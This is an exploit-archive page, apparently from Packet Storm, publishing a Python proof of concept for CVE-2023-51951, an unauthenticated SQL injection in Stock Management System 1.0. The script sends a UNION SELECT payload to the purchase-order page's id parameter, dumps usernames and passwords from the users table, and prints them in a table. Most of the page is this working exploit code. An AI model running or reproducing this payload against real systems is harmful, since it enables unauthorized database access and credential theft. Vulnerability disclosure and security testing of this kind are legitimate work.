exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Stock Management System 1.0 SQL Injection

Stock Management System 1.0 SQL Injection
Posted Apr 15, 2024
Authored by Josué Mier

Stock Management System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2023-51951
SHA-256 | ee8f6806eb002eeb79308e1f582300e6c9e5c6963aed8ff7b5b730994fc80298

Stock Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
# Date: February 6, 2024
# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
# Tested on: Linux and Windows, XAMPP
# CVE-2023-51951
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.

import requests
from bs4 import BeautifulSoup
import argparse

def print_header():
print("\033[1m\nStock Management System v1.0\033[0m")
print("\033[1mSQL Injection Exploit\033[0m")
print("\033[96mby blu3ming\n\033[0m")

def parse_response(target_url):
try:
target_response = requests.get(target_url)
soup = BeautifulSoup(target_response.text, 'html.parser')
textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text

# Split the text using ',' as a delimiter
users = textarea_text.split(',')
for user in users:
# Split username and password using ':' as a delimiter
username, password = user.split(':')
print("| {:<20} | {:<40} |".format(username, password))
except:
print("No data could be retrieved. Try again.")

def retrieve_data(base_url):
target_path = '/sms/admin/?page=purchase_order/manage_po&id='
payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"

#Dump users table
target_url = base_url + target_path + payload
print("+----------------------+------------------------------------------+")
print("| {:<20} | {:<40} |".format("username", "password"))
print("+----------------------+------------------------------------------+")
parse_response(target_url)
print("+----------------------+------------------------------------------+\n")

if __name__ == "__main__":
about = 'Unauthenticated SQL Injection Exploit - Stock Management System'
parser = argparse.ArgumentParser(description=about)
parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
args = parser.parse_args()
print_header()
retrieve_data(args.base_url)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close